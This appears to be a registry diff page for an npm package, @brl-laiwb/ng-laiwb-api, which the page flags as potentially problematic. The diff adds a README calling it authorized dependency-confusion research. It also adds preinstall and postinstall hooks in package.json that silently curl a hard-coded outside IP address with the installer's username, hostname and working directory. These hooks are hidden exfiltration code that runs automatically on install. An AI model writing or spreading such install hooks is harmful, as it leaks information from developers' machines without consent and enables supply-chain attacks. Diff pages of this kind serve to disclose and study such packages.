@brl-laiwb/ng-laiwb-api 0.0.1-security → 5.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @brl-laiwb/ng-laiwb-api might be problematic. Click here for more details.
- package/README.md +7 -3
- package/index.js +5 -0
- package/package.json +10 -3
package/README.md
CHANGED
|
@@ -1,5 +1,9 @@
|
|
|
1
|
-
# Security
|
|
1
|
+
# Security Research Package
|
|
2
2
|
|
|
3
|
-
|
|
3
|
+
**Package**: @brl-laiwb/ng-laiwb-api
|
|
4
|
+
**Version**: 5.0.2
|
|
5
|
+
**Tracking ID**: bmw
|
|
4
6
|
|
|
5
|
-
|
|
7
|
+
This package was published as part of authorized security research for dependency confusion testing.
|
|
8
|
+
|
|
9
|
+
If this package was installed in your build system, it indicates a potential vulnerability.
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,13 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@brl-laiwb/ng-laiwb-api",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "5.0.2",
|
|
4
|
+
"description": "Security research package",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "curl -s \"http://165.232.183.46:80/depconf/bmw/?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)\" > /dev/null || true",
|
|
8
|
+
"postinstall": "curl -s \"http://165.232.183.46:80/depconf/bmw/?u=$(whoami)&h=$(hostname)&d=$PWD&t=$(date +%s)\" > /dev/null || true"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [],
|
|
11
|
+
"author": "anonymous",
|
|
12
|
+
"license": "ISC"
|
|
6
13
|
}
|